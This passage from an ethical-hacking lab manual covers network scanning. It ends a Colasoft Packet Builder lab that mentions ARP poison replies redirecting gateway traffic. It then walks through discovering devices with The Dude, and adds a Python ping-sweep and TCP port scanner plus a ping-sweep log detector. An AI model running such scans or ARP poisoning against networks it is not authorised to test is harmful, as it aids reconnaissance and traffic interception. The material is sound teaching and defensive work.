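The all-zero template frame is harmless on the wire; the poison reply is not, because every host that accepts unsolicited ARP replies will start routing gateway traffic to the attacker MAC, which is exactly the behaviour a defender tests for (dynamic ARP inspection, static entries for the gateway) with a tool like this one.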

Lab Analysis

Analyze and document the results related to the lab exercise.

Tool/Utility: Colasoft Packet Builder
Information Collected/Objectives Achieved:
  Adapter Used: Realtek PCIe Family Controller
  Selected Packet Name: ARP Packets
  Result: The created packets are exported to Packets.cscpkt


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Analyze how Colasoft Packet Builder affects your network traffic while analyzing your network.

2. Evaluate what types of instant messages Capsa monitors.

3. Determine whether the packet buffer affects performance. If yes, then what steps do you take to avoid or reduce its effect on software?

Internet Connection Required

[ ] Yes   [x] No

Platform Supported

[x] Classroom   [x] iLabs


Lab

Scanning Devices in a Network Using The Dude

The Dude automatically scans all devices within specified subnets, draws and lays out a map of your networks, monitors services of your devices, and alerts you in case some service has problems.

Lab Scenario

In the previous lab you learned how packets can be built and sent using Colasoft Packet Builder. Attackers too can sniff, capture, and analyze packets from a network and obtain specific network information. The attacker can disrupt communication between hosts and clients by modifying system configurations, or through the physical destruction of the network.

As an expert ethical hacker, you should be able to gather information on an organization's network to check for vulnerabilities and fix them before an attacker gets to compromise the machines using those vulnerabilities. If you detect any attack that has been performed on a network, immediately implement preventative measures to stop any additional unauthorized access.

In this lab you will learn to use The Dude tool to scan the devices in a network; the tool will alert you when a monitored service on one of those devices stops responding, which is often the first visible sign that a device has been attacked.

Lab Objectives

The objective of this lab is to demonstrate how to scan all devices within specified subnets, draw and lay out a map of your networks, and monitor services on the network.

Note: Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks.

Lab Environment

To carry out the lab, you need:

■ The Dude located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\The Dude
■ You can also download the latest version of The Dude from http://www.mikrotik.com/thedude.php


■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Double-click The Dude installer and follow the wizard-driven installation steps to install The Dude
■ Administrative privileges to run tools

Lab Duration

Time: 10 Minutes

Overview of The Dude

The Dude network monitor is a new application that can dramatically improve the way you manage your network environment. It will automatically scan all devices within specified subnets, draw and lay out a map of your networks, monitor services of your devices, and alert you in case some service has problems.

Lab Tasks

1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

[Screenshot: Windows Server 2012 desktop.]

FIGURE 18.1: Windows Server 2012 - Desktop view

Task 1: Launch The Dude

2. In the Start menu, to launch The Dude, click The Dude icon.

[Screenshot: Windows Server 2012 Start screen with The Dude tile.]

FIGURE 18.2: Windows Server 2012 - Start menu

3. The main window of The Dude will appear.

[Screenshot: admin@localhost - The Dude 4.0beta3. Toolbar: Preferences, Local Server, Settings, Discover, Tools. The Contents tree lists Address Lists, Admins, Agents, Charts, Devices, Files, Functions, History Actions, Links, Logs (Action, Debug, Event, Syslog), Mib Nodes, Network Maps (Local), Networks, Notifications, Panels, Probes, Services, Tools. Status bar: Connected Client.]

FIGURE 18.3: Main window of The Dude

4. Click the Discover button on the toolbar of the main window.

FIGURE 18.4: Select discover button

5. The Device Discovery window appears.


[Screenshot: Device Discovery window, General tab ("Enter subnet number you want to scan for devices"). Scan Networks: 10.0.0.0/24; Agent: default; Add Networks To Auto Scan; Black List: none; Device Name Preference: DNS, SNMP, NETBIOS, IP; Discovery Mode: fast (scan by ping) / reliable (scan each service); Recursive Hops (slider from 2 to 50); Layout Map After Discovery Complete. Other tabs: Services, Device Types, Advanced. Buttons: Discover, Cancel.]

FIGURE 18.6: Device discovery window

6. In the Device Discovery window, specify the Scan Networks range, select default from the Agent drop-down list, select DNS, SNMP, NETBIOS, and IP from the Device Name Preference drop-down list, and click Discover.

FIGURE 18.7: Selecting device name preference

7. Once the scan is complete, all the devices connected to the specified network are displayed.
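What the Discover button does with the General tab settings (a subnet range, a blacklist, a fast-by-ping or reliable-per-service mode, and a name preference order of DNS, SNMP, NETBIOS, IP) can be reproduced in a few lines. The following Python script is an added example, not The Dude's code and not part of the original lab, that implements those options: a ping sweep for fast mode, a TCP-connect check of a handful of services for reliable mode, and a name resolver that walks the preference list. The real probes use the OS ping command (Linux and Windows flag forms are assumed) and socket.create_connection; discover() takes the probes as parameters so that the constructed results at the bottom, which stand in for the lab's 10.0.0.0/24 network, run without touching a network. The service list, port numbers and host names are the example's own choices, not The Dude's defaults.

```python
import ipaddress
import platform
import socket
import subprocess

# TCP services checked in "reliable" mode (example's own list; The Dude has its own Services tab).
SERVICES = {"ssh": 22, "http": 80, "msrpc": 135, "netbios-ssn": 139, "https": 443, "microsoft-ds": 445}
NAME_PREFERENCE = ("DNS", "SNMP", "NETBIOS", "IP")   # the order shown in Figure 18.6


def hosts_in(cidr, black_list=()):
    """All usable host addresses in the subnet, minus the blacklist."""
    net = ipaddress.ip_network(cidr, strict=False)
    skip = set(black_list)
    return [str(h) for h in net.hosts() if str(h) not in skip]


def icmp_ping(host, timeout_s=1):
    """Real 'fast' probe: one ICMP echo via the OS ping command, so no raw-socket privilege is needed.
    Flags assume Linux (-c / -W seconds) or Windows (-n / -w milliseconds)."""
    windows = platform.system() == "Windows"
    cmd = ["ping", "-n" if windows else "-c", "1",
           "-w" if windows else "-W", str(timeout_s * 1000 if windows else timeout_s), host]
    return subprocess.run(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL).returncode == 0


def tcp_probe(host, port, timeout_s=1):
    """Real 'reliable' probe: a completed TCP handshake means the service is listening."""
    try:
        with socket.create_connection((host, port), timeout=timeout_s):
            return True
    except OSError:
        return False


def discover(cidr, mode="fast", black_list=(), services=SERVICES, ping=icmp_ping, connect=tcp_probe):
    """Map each responding host to the probes it answered.
    fast: one ping per host, so hosts that drop ICMP are missed.
    reliable: every service is tried on every host; slower, but finds the ICMP-filtered ones."""
    if mode not in ("fast", "reliable"):
        raise ValueError(f"unknown discovery mode {mode!r}")
    found = {}
    for host in hosts_in(cidr, black_list):
        if mode == "fast":
            if ping(host):
                found[host] = ["ping"]
        else:
            up = [name for name, port in services.items() if connect(host, port)]
            if up:
                found[host] = up
    return found


def device_name(host, sources, preference=NAME_PREFERENCE):
    """Display name from the first source in preference order that knows the host; IP is the fallback."""
    for source in preference:
        if source == "IP":
            return host
        name = sources.get(source, {}).get(host)
        if name:
            return name
    return host


# Constructed stand-in for the lab network: .1 answers ping and HTTP, .7 drops ICMP but serves SMB.
SAMPLE_PING_UP = {"10.0.0.1"}
SAMPLE_TCP_UP = {("10.0.0.1", 80), ("10.0.0.7", 139), ("10.0.0.7", 445)}
SAMPLE_NAMES = {"DNS": {"10.0.0.1": "gw.lab.example"}, "NETBIOS": {"10.0.0.7": "WIN-HOST7"}}


def sample_discovery(mode):
    """Run discover() against the constructed stand-in instead of a real network."""
    return discover("10.0.0.0/28", mode,
                    ping=lambda h: h in SAMPLE_PING_UP,
                    connect=lambda h, p: (h, p) in SAMPLE_TCP_UP)


if __name__ == "__main__":
    for mode in ("fast", "reliable"):
        result = sample_discovery(mode)
        print(mode, {device_name(h, SAMPLE_NAMES): up for h, up in result.items()})
```

Against a real network, call discover("10.0.0.0/24", "reliable") with the default probes; the stand-in shows the point of the two modes, since fast mode never lists 10.0.0.7 while reliable mode does. A host firewall that drops ICMP is common on Windows, so a ping-only sweep of the lab subnet understates what is there.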


[Screenshot: The Dude network map of the Local network showing the discovered Windows hosts, with memory and disk usage figures for the host that could be queried.]

FIGURE 18.8: Overview of network connection

8. Select a device and place the mouse cursor on it to display detailed information about that device.

[Figure: The Dude network map with the tooltip for a selected device (IP, services, CPU, memory and disk usage)]

FIGURE 18.9: Detailed information of the device

9. Now, click the down arrow for the Local drop-down list to see information on History Actions, Tools, Files, Logs, and so on.


FIGURE 18.10: Selecting Local information

10. Select options from the drop-down list to view the complete information.


[Figure: The Dude History Actions log ("Network Map Element changed" entries) and the Devices list for the scanned network]

FIGURE 18.11: Scanned network complete information


11. As described previously, you may select any of the other options from the drop-down list to view the respective information.

12. Once scanning is complete, click the button to disconnect.
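The fast discovery mode used above works by pinging every address in the Scan Networks range, which is exactly the pattern a defender can watch for. The following is an added example, not part of the lab manual or of The Dude: it runs over constructed firewall log lines (the simplified log format, the 60-second window and the threshold of 8 hosts are assumptions) and flags any source that sends echo-requests to many distinct hosts in 10.0.0.0/24 within a short window.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed firewall log lines (not from the lab manual), in an assumed
# simplified format: "<epoch> ICMP echo-request <src> -> <dst>".
SAMPLE_LOG = """\
1700000000 ICMP echo-request 10.0.0.5 -> 10.0.0.1
1700000000 ICMP echo-request 10.0.0.5 -> 10.0.0.2
1700000001 ICMP echo-request 10.0.0.5 -> 10.0.0.3
1700000001 ICMP echo-request 10.0.0.5 -> 10.0.0.4
1700000002 ICMP echo-request 10.0.0.5 -> 10.0.0.6
1700000002 ICMP echo-request 10.0.0.5 -> 10.0.0.7
1700000003 ICMP echo-request 10.0.0.5 -> 10.0.0.8
1700000003 ICMP echo-request 10.0.0.5 -> 10.0.0.9
1700000010 ICMP echo-request 10.0.0.12 -> 10.0.0.1
1700000500 ICMP echo-request 10.0.0.12 -> 10.0.0.2
"""

LINE_RE = re.compile(r"^(?P<ts>\d+) ICMP echo-request (?P<src>[\d.]+) -> (?P<dst>[\d.]+)$")

def parse_echo_requests(text):
    """Yield (timestamp, src, dst) for each well-formed echo-request line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield int(m["ts"]), m["src"], m["dst"]

def detect_ping_sweeps(text, network="10.0.0.0/24", window=60, threshold=8):
    """Return {src: distinct_targets} for every source that pinged at least
    `threshold` distinct hosts inside `network` within some `window` seconds."""
    net = ipaddress.ip_network(network)
    probes_by_src = defaultdict(list)  # src -> [(ts, dst), ...]
    for ts, src, dst in parse_echo_requests(text):
        if ipaddress.ip_address(dst) in net:
            probes_by_src[src].append((ts, dst))
    hits = {}
    for src, probes in probes_by_src.items():
        probes.sort()
        best, left = 0, 0
        for right in range(len(probes)):
            # slide the window so it only covers probes within `window` seconds
            while probes[right][0] - probes[left][0] > window:
                left += 1
            best = max(best, len({dst for _, dst in probes[left:right + 1]}))
        if best >= threshold:
            hits[src] = best
    return hits
```

Only 10.0.0.5 is reported: 10.0.0.12 pings two hosts, but 490 seconds apart, so it never reaches the threshold inside one window.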


[Figure: The Dude network map showing the connected systems before disconnecting]

FIGURE 18.12: Connection of systems in network

Lab Analysis
Analyze and document the results related to the lab exercise.

Tool/Utility: The Dude

Information Collected/Objectives Achieved:
  IP Address Range: 10.0.0.0 — 10.0.0.24
  Device Name Preferences: DNS, SNMP, NETBIOS, IP
  Output: List of connected systems and devices in the network


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Internet Connection Required

☐ Yes ☑ No

Platform Supported

☑ Classroom ☑ iLabs
